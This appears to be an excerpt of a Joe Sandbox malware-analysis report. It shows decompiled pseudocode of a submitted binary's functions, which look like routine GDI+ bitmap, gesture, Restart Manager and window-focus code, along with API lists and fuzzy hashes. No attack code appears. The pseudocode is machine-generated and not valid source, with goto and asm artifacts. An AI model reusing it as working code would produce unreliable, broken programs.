      					_v1052 = _t165;
      					_v1040 = 1;
      					_v1044 = 0x26200a;
      				}
      				_v1048 = E00A36C4A(_t160);
      				if(E009D70FC(_t160, _t184, _t214, E00A36C24(_t160), _v1048, _v1052, 0, 0, _v1040) != 0) {
      					_v1036 = _v1036 & 0x00000000;
      					__eflags = _t189 & 0x00010000;
      					if((_t189 & 0x00010000) == 0) {
      						L25:
      						__eflags = _v1044 - _t189;
      						if(_v1044 != _t189) {
      							E00A36CDE( &_v1080,  *(_t198 + 0xc),  *(_t198 + 0x10),  *((intOrPtr*)(_t198 + 0x14)), _v1044,  *((intOrPtr*)(_t198 + 8)));
      							E00A3756E( &_v1060,  &_v1080);
      							E00A3759D( &_v1060, _t160, 0, 0);
      							_push(_v1060);
      							L00AC656A();
      							_push(_v1076);
      							L00AC6570();
      							goto L38;
      						} else {
      							_v1080 = _v1080 & 0x00000000;
      							_v1076 = _v1076 & 0x00000000;
      							_v1072 =  *(_t198 + 0xc);
      							_v1068 =  *(_t198 + 0x10);
      							_push( &_v1104);
      							_push(_t189);
      							_push(1);
      							_t133 =  &_v1080;
      							_push(_t133);
      							_push( *((intOrPtr*)(_t160 + 4)));
      							L00AC65CA();
      							__eflags = _t133;
      							if(_t133 == 0) {
      								_t133 = 0;
      								__eflags = 0;
      							} else {
      								 *(_t160 + 8) = _t133;
      							}
      							__eflags = _t133;
      							if(_t133 == 0) {
      								_v1044 = _v1044 & 0x00000000;
      								_t162 =  *((intOrPtr*)(_t198 + 8));
      								_t194 =  *(_t198 + 0xc) * _v1052 + 7 >> 3;
      								__eflags =  *(_t198 + 0x10);
      								_v1040 = _v1088;
      								if( *(_t198 + 0x10) > 0) {
      									do {
      										E009A681A(_t162, _t194, _v1040, _t194);
      										_v1040 = _v1040 + _v1096;
      										_t162 = _t162 +  *((intOrPtr*)(_t198 + 0x14));
      										_t209 = _t209 + 0x10;
      										_v1044 = _v1044 + 1;
      										__eflags = _v1044 -  *(_t198 + 0x10);
      									} while (_v1044 <  *(_t198 + 0x10));
      								}
      								_t201 = _v1056;
      								_t135 =  &_v1104;
      								_push(_t135);
      								_push( *((intOrPtr*)(_t201 + 4)));
      								L00AC65D0();
      								__eflags = _t135;
      								if(_t135 != 0) {
      									 *(_t201 + 8) = _t135;
      								}
      								L38:
      								__eflags = _v1036;
      								if(_v1036 != 0) {
      									do {
      										_t200 =  *_v1036;
      										_v1036 = _t200;
      										E00AAB4AB(_v1036);
      										__eflags = _t200;
      									} while (_t200 != 0);
      								}
      								_t126 = 0;
      								__eflags = 0;
      							} else {
      								__eflags = _v1036;
      								if(_v1036 != 0) {
      									do {
      										_t202 =  *_v1036;
      										_v1036 = _t202;
      										E00AAB4AB(_v1036);
      										__eflags = _t202;
      									} while (_t202 != 0);
      								}
      								goto L15;
      							}
      						}
      					} else {
      						_t195 = E00A36C92(_t160);
      						_v1040 = _t195;
      						__eflags = _t195 - 0x400;
      						if(__eflags > 0) {
      							L11:
      							_t196 = E009B947A(_t160,  &_v1036, __eflags, _t195);
      						} else {
      							_push(_t195);
      							__eflags = E009B935A(_t160, _t184, _t195, _t198, __eflags);
      							if(__eflags == 0) {
      								goto L11;
      							} else {
      								_t142 = E00AAD9E0(_t195);
      								_t196 = _t209;
      							}
      						}
      						__eflags = _t196;
      						if(_t196 != 0) {
      							E00A36CB8(_t142, _t160, _t196, _v1040);
      							_t144 =  *(_t196 + 4);
      							__eflags = _t144;
      							if(_t144 == 0) {
      								L18:
      								__eflags = _v1036;
      								if(_v1036 != 0) {
      									do {
      										_t203 =  *_v1036;
      										_v1036 = _t203;
      										E00AAB4AB(_v1036);
      										__eflags = _t203;
      									} while (_t203 != 0);
      								}
      								goto L6;
      								L42:
      							} else {
      								__eflags = _t144 - 0x100;
      								if(_t144 <= 0x100) {
      									_v1048 = _v1048 & 0x00000000;
      									__eflags = _t144;
      									if(_t144 != 0) {
      										_t38 = _t196 + 8; // 0x8
      										_v1040 = _t38;
      										do {
      											_t181 =  *_v1040;
      											_t151 = _v1048;
      											_v1040 = _v1040 + 4;
      											 *((char*)(_t206 + _t151 * 4 - 0x402)) = _t181 >> 0x10;
      											_t184 = _t181 >> 8;
      											_v1048 = _v1048 + 1;
      											 *((char*)(_t206 + _t151 * 4 - 0x403)) = _t181 >> 8;
      											 *(_t206 + _t151 * 4 - 0x404) = _t181;
      											 *((char*)(_t206 + _t151 * 4 - 0x401)) = 0;
      											__eflags = _v1048 -  *(_t196 + 4);
      										} while (_v1048 <  *(_t196 + 4));
      									}
      									E00A36D19(_t198, 0,  *(_t196 + 4),  &_v1032);
      									_t189 = _v1064;
      									goto L25;
      								} else {
      									goto L18;
      								}
      							}
      						} else {
      							__eflags = _v1036 - _t196;
      							if(_v1036 != _t196) {
      								do {
      									_t204 =  *_v1036;
      									_v1036 = _t204;
      									E00AAB4AB(_v1036);
      									__eflags = _t204;
      								} while (_t204 != 0);
      							}
      							L15:
      							_t126 = 0x8007000e;
      						}
      					}
      				} else {
      					L6:
      					_t126 = 0x80004005;
      				}
      				_pop(_t190);
      				_pop(_t199);
      				_pop(_t161);
      				return E00AAB46A(_t126, _t161, _v8 ^ _t206, _t184, _t190, _t199);
      				goto L42;
      			}

      APIs
        • Part of subcall function 00A36C70: GdipGetImagePixelFormat.GDIPLUS(?,00D11EB4,00000000,00000000,?,00A39945,00000000,00000000,00D11EB4), ref: 00A36C80
      • _free.LIBCMT ref: 00A39A4E
      • _free.LIBCMT ref: 00A39A9A
      • GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D11EB4), ref: 00A39B63
      • _free.LIBCMT ref: 00A39B93
        • Part of subcall function 00A36C92: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00A399FF,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00A36CA6
      • GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D11EB4), ref: 00A39C0F
      • _free.LIBCMT ref: 00A39C8A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
      • String ID: &
      • API String ID: 4092590016-3042966939
      • Opcode ID: 81ada92db07ef5977336d4110ed7eba9bfb48050df4decb4d4aa32ead4af4a68
      • Instruction ID: a5a41e2d1179a65c0d7a889b98a20de2a1f78d706e411e48e17e1a176d5c822f
      • Opcode Fuzzy Hash: 81ada92db07ef5977336d4110ed7eba9bfb48050df4decb4d4aa32ead4af4a68
      • Instruction Fuzzy Hash: 83A15CB19002289BDB21DF14CD81BDAB7B5EF84314F1085E9F649A7251CB749EC5CF58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 55%
      			E009ACD40(intOrPtr __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
      				struct HINSTANCE__* _t81;
      				void* _t82;
      				intOrPtr _t88;
      				intOrPtr _t92;
      				void* _t95;
      				signed int _t96;
      				intOrPtr _t99;
      				signed int _t103;
      				struct HINSTANCE__* _t109;
      				void* _t115;
      				void* _t119;
      				void* _t122;
      				void* _t125;
      				void* _t127;
      				intOrPtr _t128;
      				void* _t130;
      				struct HWND__* _t135;
      				signed int _t136;
      				signed int _t141;
      				intOrPtr* _t146;
      				void* _t147;
      				void* _t148;
      				long long* _t149;
      				signed long long _t173;
      
      				_t173 = __fp0;
      				_t111 = __ecx;
      				_t110 = __ebx;
      				_push(0x18);
      				E00AAD232(0xac7ffa, __ebx, __edi, __esi);
      				_t146 = __ecx;
      				_t152 =  *0xd0fb60 & 0x00000001;
      				if(( *0xd0fb60 & 0x00000001) == 0) {
      					 *0xd0fb60 =  *0xd0fb60 | 0x00000001;
      					 *(_t147 - 4) =  *(_t147 - 4) & 0x00000000;
      					_push("user32.dll");
      					_t109 = E009AB6E5(__ecx, __ecx, _t152);
      					 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
      					_pop(_t111);
      					 *0xd0fb5c = _t109;
      				}
      				_t81 =  *0xd0fb5c; // 0x0
      				if(_t81 == 0) {
      					_t81 = E009B8782(_t111);
      				}
      				_t141 = GetProcAddress;
      				if(( *0xd0fb60 & 0x00000002) == 0) {
      					 *0xd0fb60 =  *0xd0fb60 | 0x00000002;
      					 *0xd0fb58 = GetProcAddress(_t81, "GetGestureInfo");
      				}
      				if(( *0xd0fb60 & 0x00000004) == 0) {
      					 *0xd0fb60 =  *0xd0fb60 | 0x00000004;
      					 *0xd0fb54 = GetProcAddress( *0xd0fb5c, "CloseGestureInfoHandle");
      				}
      				if( *0xd0fb58 == 0 ||  *0xd0fb54 == 0) {
      					L34:
      					_t82 = E009AC865(_t110, _t146, _t141, __eflags);
      					goto L35;
      				} else {
      					_t141 = 0;
      					_t110 = 0x30;
      					_t161 =  *((intOrPtr*)(_t146 + 0x50));
      					if( *((intOrPtr*)(_t146 + 0x50)) == 0) {
      						 *((intOrPtr*)(_t146 + 0x50)) = E009A6291(_t161, _t110);
      					}
      					E00AAB3F0( *((intOrPtr*)(_t146 + 0x50)), _t141, _t110);
      					_t149 = _t148 + 0xc;
      					 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x50)))) = _t110;
      					_push( *((intOrPtr*)(_t146 + 0x50)));
      					_push( *((intOrPtr*)(_t147 + 0xc)));
      					if( *0xd0fb58() == 0) {
      						L32:
      						_push(_t110);
      						_push(_t141);
      						_push( *((intOrPtr*)(_t146 + 0x50)));
      						goto L33;
      					} else {
      						_t135 =  *(_t146 + 0x20);
      						_t88 =  *((intOrPtr*)(_t146 + 0x50));
      						if( *((intOrPtr*)(_t88 + 0xc)) != _t135) {
      							goto L32;
      						}
      						 *(_t147 - 0x14) =  *((short*)(_t88 + 0x10));
      						 *(_t147 - 0x10) =  *((short*)(_t88 + 0x12));
      						ScreenToClient(_t135, _t147 - 0x14);
      						_t92 =  *((intOrPtr*)(_t146 + 0x50));
      						_t141 = 1;
      						_t115 =  *((intOrPtr*)(_t92 + 8)) - 1;
      						if(_t115 == 0) {
      							 *(_t146 + 0x3c) =  *(_t147 - 0x14);
      							 *(_t146 + 0x40) =  *(_t147 - 0x10);
      							 *((intOrPtr*)(_t146 + 0x44)) =  *((intOrPtr*)(_t92 + 0x20));
      							 *(_t146 + 0x48) =  *(_t92 + 0x24);
      							goto L34;
      						}
      						_t119 = _t115 - 1;
      						if(_t119 == 0) {
      							_t136 = _t135 | 0xffffffff;
      							 *(_t146 + 0x3c) = _t136;
      							_push(_t110);
      							_push(0);
      							 *(_t146 + 0x40) = _t136;
      							 *((intOrPtr*)(_t146 + 0x44)) = 0;
      							 *(_t146 + 0x48) = 0;
      							_push(_t92);
      							L33:
      							E00AAB3F0();
      							goto L34;
      						}
      						_t122 = _t119 - 1;
      						if(_t122 == 0) {
      							_t95 =  *((intOrPtr*)(_t92 + 0x20)) -  *((intOrPtr*)(_t146 + 0x44));
      							__eflags = _t95;
      							_t96 =  *((intOrPtr*)( *_t146 + 0x134))( *(_t147 - 0x14),  *(_t147 - 0x10), _t95);
      							L26:
      							asm("sbb edi, edi");
      							_t141 =  ~_t96 + 1;
      							if(_t141 == 0) {
      								 *0xd0fb54( *((intOrPtr*)(_t147 + 0xc)));
      							}
      							L28:
      							 *(_t146 + 0x3c) =  *(_t147 - 0x14);
      							 *(_t146 + 0x40) =  *(_t147 - 0x10);
      							_t99 =  *((intOrPtr*)(_t146 + 0x50));
      							 *((intOrPtr*)(_t146 + 0x44)) =  *((intOrPtr*)(_t99 + 0x20));
      							 *(_t146 + 0x48) =  *(_t99 + 0x24);
      							if(_t141 != 0) {
      								goto L34;
      							}
      							_t82 = 0;
      							L35:
      							return E00AAD30A(_t82);
      						}
      						_t125 = _t122 - 1;
      						if(_t125 == 0) {
      							_t96 =  *((intOrPtr*)( *_t146 + 0x138))( *(_t146 + 0x3c),  *(_t146 + 0x40),  *(_t147 - 0x14),  *(_t147 - 0x10));
      							goto L26;
      						}
      						_t127 = _t125 - 1;
      						if(_t127 == 0) {
      							_t128 =  *((intOrPtr*)(_t92 + 0x20));
      							_t103 =  *(_t92 + 0x24);
      							 *(_t147 - 0x1c) =  *(_t147 - 0x1c) & 0x00000000;
      							 *(_t147 - 0x18) = _t103;
      							 *(_t147 - 0x18) =  *(_t147 - 0x18) & 0x80000000;
      							 *((intOrPtr*)(_t147 - 0x24)) = _t128;
      							 *(_t147 - 0x20) = _t103 & 0x7fffffff;
      							asm("fild qword [ebp-0x24]");
      							asm("fild qword [ebp-0x1c]");
      							asm("fchs");
      							asm("faddp st1, st0");
      							 *_t149 = _t173 /  *0xad8878 *  *0xad8870 *  *0xad8868 -  *0xad8860;
      							_t96 =  *((intOrPtr*)( *_t146 + 0x13c))( *(_t147 - 0x14),  *(_t147 - 0x10), _t128, _t128);
      							goto L26;
      						}
      						_t130 = _t127 - 1;
      						if(_t130 == 0) {
      							_t96 =  *((intOrPtr*)( *_t146 + 0x140))( *(_t147 - 0x14),  *(_t147 - 0x10));
      							goto L26;
      						}
      						if(_t130 != 1) {
      							goto L28;
      						}
      						_t96 =  *((intOrPtr*)( *_t146 + 0x144))( *(_t147 - 0x14),  *(_t147 - 0x10),  *((intOrPtr*)(_t92 + 0x20)));
      						goto L26;
      					}
      				}
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 009ACD47
      • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 009ACDA0
      • GetProcAddress.KERNEL32(CloseGestureInfoHandle,00000018), ref: 009ACDC2
      • _memset.LIBCMT ref: 009ACDFC
      • ScreenToClient.USER32 ref: 009ACE3F
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateClientH_prolog3Screen_memset
      • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
      • API String ID: 4039673286-2905070798
      • Opcode ID: cc2818ce99f750155920da25501efb77faf662fe2105e31b5a3cc15502e92a45
      • Instruction ID: 5949c30da9717d4cac2d39aabdde9ac23bfff1ed16fdb71ea8d489bf3a7a5e53
      • Opcode Fuzzy Hash: cc2818ce99f750155920da25501efb77faf662fe2105e31b5a3cc15502e92a45
      • Instruction Fuzzy Hash: 1871CFB0900705DFCB28DF65D954A6ABBF6FF49300B21496DE45A9B7A0CB35AC40CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 81%
      			E009A9DBC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t42;
      				intOrPtr _t47;
      				intOrPtr _t50;
      				intOrPtr _t60;
      				void* _t74;
      				void* _t79;
      
      				_t72 = __edx;
      				_push(0x28);
      				E00AAD29B(0xac7eec, __ebx, __edi, __esi);
      				_t60 =  *((intOrPtr*)(_t79 + 8));
      				_t74 = __ecx;
      				E009A5D70(_t79 - 0x34, __edx, E009B9D52());
      				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
      				if((E009B0A7A(__ecx) & 0x00004000) == 0) {
      					_t34 =  *((intOrPtr*)(__ecx + 0xe4));
      					_t64 = _t79 - 0x34;
      					E009A909D(_t79 - 0x34, __edx,  *((intOrPtr*)(__ecx + 0xe4)),  *((intOrPtr*)(_t34 - 0xc)));
      					if(_t60 != 0) {
      						E009A909D(_t79 - 0x34, _t72, 0xad8318, E00AAD550(0xad8318));
      						_t64 = _t79 - 0x34;
      						E009A938A(_t79 - 0x34, _t60);
      						_t42 =  *((intOrPtr*)(_t74 + 0x78));
      						if(_t42 > 0) {
      							swprintf(_t79 - 0x30, 0x20, ":%d", _t42);
      							_push(E00AAD550(_t79 - 0x30));
      							_t47 = _t79 - 0x30;
      							goto L9;
      						}
      					}
      				} else {
      					if(_t60 != 0) {
      						E009A938A(_t79 - 0x34, _t60);
      						_t50 =  *((intOrPtr*)(_t74 + 0x78));
      						if(_t50 > 0) {
      							swprintf(_t79 - 0x30, 0x20, ":%d", _t50);
      							E009A909D(_t79 - 0x34, _t72, _t79 - 0x30, E00AAD550(_t79 - 0x30));
      						}
      						E009A909D(_t79 - 0x34, _t72, 0xad8318, E00AAD550(0xad8318));
      					}
      					_t47 =  *((intOrPtr*)(_t74 + 0xe4));
      					_push( *((intOrPtr*)(_t47 - 0xc)));
      					L9:
      					_push(_t47);
      					_t64 = _t79 - 0x34;
      					E009A909D(_t79 - 0x34, _t72);
      				}
      				_t76 =  *((intOrPtr*)(_t79 - 0x34));
      				E009BB926(_t64, _t72,  *((intOrPtr*)(_t74 + 0x20)),  *((intOrPtr*)(_t79 - 0x34)));
      				E009A5510(_t76 - 0x10, _t72);
      				return E00AAD31E(_t60, _t74, _t76);
      			}

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A9DC3
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      • swprintf.LIBCMT ref: 009A9E0D
      • _strlen.LIBCMT ref: 009A9E16
        • Part of subcall function 009A909D: _strnlen.LIBCMT ref: 009A90CF
        • Part of subcall function 009A909D: _memcpy_s.LIBCMT ref: 009A9103
      • _strlen.LIBCMT ref: 009A9E31
      • _strlen.LIBCMT ref: 009A9E68
      • swprintf.LIBCMT ref: 009A9E94
      • _strlen.LIBCMT ref: 009A9E9D
        • Part of subcall function 009A938A: _strlen.LIBCMT ref: 009A939C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _strlen$swprintf$H_prolog3_LongWindow_memcpy_s_strnlen
      • String ID: - $:%d
      • API String ID: 3048052868-2359489159
      • Opcode ID: 37734f0ba2d8228739d7de25822a8f14f700024b13ef52a1d0a76d79f6196116
      • Instruction ID: cccc1cc19c8ce7a696906a27b912ee037c9efa868c0521abd876b108f034fb09
      • Opcode Fuzzy Hash: 37734f0ba2d8228739d7de25822a8f14f700024b13ef52a1d0a76d79f6196116
      • Instruction Fuzzy Hash: 5D312F729011157BDB05FBA4DE86FEEB7ADBF52300F144829B506A7192EF61AE04C7E0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E009B289C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t73;
      				intOrPtr* _t83;
      				intOrPtr* _t84;
      				void* _t87;
      				intOrPtr* _t93;
      				intOrPtr* _t122;
      				intOrPtr _t159;
      				intOrPtr _t165;
      				intOrPtr _t167;
      				void* _t170;
      
      				_t157 = __edx;
      				_push(0x28);
      				E00AAD29B(0xac82b2, __ebx, __edi, __esi);
      				_t122 = __ecx;
      				E009A5D70(_t170 - 0x24, __edx, E009B9D52());
      				_t159 = 0;
      				 *((intOrPtr*)(_t170 - 4)) = 0;
      				E009A5D70(_t170 - 0x28, __edx, E009B9D52());
      				 *((char*)(_t170 - 4)) = 1;
      				_t73 = E009A6C6C( *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc)))) - 0x10) + 0x10;
      				 *((intOrPtr*)(_t170 - 0x30)) = _t73;
      				 *((char*)(_t170 - 4)) = 2;
      				if( *((intOrPtr*)(_t73 - 0xc)) == 0) {
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					__imp__CoCreateGuid(_t170 - 0x20);
      					E009A5D70(_t170 - 0x2c, _t157, E009B9D52());
      					_push( *(_t170 - 0x11) & 0x000000ff);
      					_push( *(_t170 - 0x12) & 0x000000ff);
      					_push( *(_t170 - 0x13) & 0x000000ff);
      					_push( *(_t170 - 0x14) & 0x000000ff);
      					_push( *(_t170 - 0x15) & 0x000000ff);
      					_push( *(_t170 - 0x16) & 0x000000ff);
      					_push( *(_t170 - 0x17) & 0x000000ff);
      					_push( *(_t170 - 0x18) & 0x000000ff);
      					_push( *(_t170 - 0x1a) & 0x0000ffff);
      					_push( *(_t170 - 0x1c) & 0x0000ffff);
      					 *((char*)(_t170 - 4)) = 3;
      					E009A911D(_t170 - 0x30, "%08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X",  *((intOrPtr*)(_t170 - 0x20)));
      					 *((char*)(_t170 - 4)) = 2;
      					E009A5510( *((intOrPtr*)(_t170 - 0x2c)) + 0xfffffff0, _t157);
      					_t159 = 0;
      				}
      				E009A6000(_t157, _t159,  *((intOrPtr*)(_t122 + 0x48)));
      				E009A909D(_t170 - 0x28, _t157, "RestartByRestartManager", E00AAD550("RestartByRestartManager"));
      				E009A909D(_t170 - 0x28, _t157, ":", E00AAD550(":"));
      				E009A909D(_t170 - 0x28, _t157,  *((intOrPtr*)(_t170 - 0x30)),  *((intOrPtr*)( *((intOrPtr*)(_t170 - 0x30)) - 0xc)));
      				if(E009B20AE(_t170 - 0x24,  *((intOrPtr*)(_t170 - 0x28)), _t159) == 0xffffffff) {
      					E009A909D(_t170 - 0x24, _t157, " /", E00AAD550(" /"));
      					E009A909D(_t170 - 0x24, _t157,  *((intOrPtr*)(_t170 - 0x28)),  *((intOrPtr*)( *((intOrPtr*)(_t170 - 0x28)) - 0xc)));
      				}
      				_t83 =  *((intOrPtr*)( *_t122 + 0xfc))();
      				if(_t83 != _t159) {
      					_t157 =  *_t83;
      					 *((intOrPtr*)( *_t83 + 0x24))(_t170 - 0x30);
      				}
      				_push( *((intOrPtr*)(_t170 - 0x24)));
      				if( *((intOrPtr*)(_t170 + 8)) == _t159) {
      					_t84 = E009B2018(_t122, _t170 - 0x2c, _t157, _t159);
      					_t165 =  *_t122;
      					 *((char*)(_t170 - 4)) = 5;
      					 *((intOrPtr*)(_t170 - 0x34)) =  *_t84;
      					_t87 =  *((intOrPtr*)(_t165 + 0xcc))( *((intOrPtr*)(_t170 - 0x34)),  *((intOrPtr*)(_t165 + 0xf0))(_t159, _t159, _t159, _t159));
      					_push( *((intOrPtr*)(_t170 - 0x2c)));
      				} else {
      					_t93 = E009B2018(_t122, _t170 - 0x34, _t157, _t159);
      					_t167 =  *_t122;
      					 *((char*)(_t170 - 4)) = 4;
      					 *((intOrPtr*)(_t170 - 0x2c)) =  *_t93;
      					_t87 =  *((intOrPtr*)(_t167 + 0xcc))( *((intOrPtr*)(_t170 - 0x2c)),  *((intOrPtr*)( *_t122 + 0xf0))(E009B1ED2,  *((intOrPtr*)( *_t122 + 0xf4))( *((intOrPtr*)(_t167 + 0xf8))(_t159))));
      					_push( *((intOrPtr*)(_t170 - 0x34)));
      				}
      				__imp__#6();
      				E009A5510( *((intOrPtr*)(_t170 - 0x30)) + 0xfffffff0, _t157);
      				E009A5510( *((intOrPtr*)(_t170 - 0x28)) + 0xfffffff0, _t157);
      				E009A5510( *((intOrPtr*)(_t170 - 0x24)) + 0xfffffff0, _t157);
      				return E00AAD31E(_t122, _t159, _t87);
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _strlen$CreateFreeGuidH_prolog3_String
      • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
      • API String ID: 1721273623-5890034
      • Opcode ID: a1e2b01dc016bbf550fc7650c08fe686947fed8f0b576213796eb4c52eec7622
      • Instruction ID: ae5c2e52ef66432276d5e2223e85637f677e6da86ba0473c7bbcb97709fbebdf
      • Opcode Fuzzy Hash: a1e2b01dc016bbf550fc7650c08fe686947fed8f0b576213796eb4c52eec7622
      • Instruction Fuzzy Hash: 54619172900415AFCF01EBA8CD59EFEBBB9EF4A310F140459F556B72A2DA359E04CB60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E009AE4BA(void* __ebx, void* __ecx, void* __edx, signed int _a4, long _a8) {
      				struct HWND__* _v8;
      				void* __edi;
      				void* _t12;
      				void* _t14;
      				void* _t15;
      				void* _t18;
      				void* _t19;
      				void* _t29;
      				struct HWND__* _t30;
      				signed int _t34;
      				void* _t36;
      				void* _t38;
      				void* _t42;
      
      				_t36 = __edx;
      				_t29 = __ebx;
      				_push(__ecx);
      				_t38 = __ecx;
      				_t12 = E009AE492(__ecx, __ecx);
      				_t34 = _a4 & 0x0000fff0;
      				_t42 = _t12;
      				_t14 = _t34 - 0xf040;
      				if(_t14 == 0) {
      					L11:
      					if(_a8 != 0x75 || _t42 == 0) {
      						L15:
      						_t15 = 0;
      						goto L16;
      					} else {
      						E009B0E11(_t29, _t42, _t36);
      						L14:
      						_t15 = 1;
      						L16:
      						return _t15;
      					}
      				}
      				_t18 = _t14 - 0x10;
      				if(_t18 == 0) {
      					goto L11;
      				}
      				_t19 = _t18 - 0x10;
      				if(_t19 == 0 || _t19 == 0xa0) {
      					if(_t34 == 0xf060 || _a8 != 0) {
      						if(_t42 != 0) {
      							_push(_t29);
      							_t30 =  *(_t38 + 0x20);
      							_v8 = GetFocus();
      							E009AC90B(_t30, _t34, _t36, SetActiveWindow( *(_t42 + 0x20)));
      							SendMessageA( *(_t42 + 0x20), 0x112, _a4, _a8);
      							if(IsWindow(_t30) != 0) {
      								SetActiveWindow(_t30);
      							}
      							if(IsWindow(_v8) != 0) {
      								SetFocus(_v8);
      							}
      						}
      					}
      					goto L14;
      				} else {
      					goto L15;
      				}
      			}
      0x009ae4ba
      0x009ae4ba
      0x009ae4bf
      0x009ae4c2
      0x009ae4c4
      0x009ae4cc
      0x009ae4d2
      0x009ae4d6
      0x009ae4db
      0x009ae55b
      0x009ae560
      0x009ae572
      0x009ae572
      0x00000000
      0x009ae566
      0x009ae568
      0x009ae56d
      0x009ae56f
      0x009ae574
      0x009ae577
      0x009ae577
      0x009ae560
      0x009ae4dd
      0x009ae4e0
      0x00000000
      0x00000000
      0x009ae4e2
      0x009ae4e5
      0x009ae4f8
      0x009ae502
      0x009ae504
      0x009ae505
      0x009ae517
      0x009ae51d
      0x009ae530
      0x009ae541
      0x009ae544
      0x009ae544
      0x009ae54e
      0x009ae553
      0x009ae553
      0x009ae54e
      0x009ae502
      0x00000000
      0x00000000
      0x00000000
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ActiveFocus$MessageSend
      • String ID: u
      • API String ID: 1556911595-4067256894
      • Opcode ID: ca8d35279ee249f9f95c3bea03f4d0e4b90fac649579fe26d1b611fc973b5356
      • Instruction ID: c46651232cd62a2ae13353ad0de03c8b7602a6a50b45dff77c0c1af94f4b8082
      • Opcode Fuzzy Hash: ca8d35279ee249f9f95c3bea03f4d0e4b90fac649579fe26d1b611fc973b5356
      • Instruction Fuzzy Hash: 4F110872D00209A7CF34AB79ED08A6E7BADEF86318B085921F90296575E634CE10DBD0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 95%
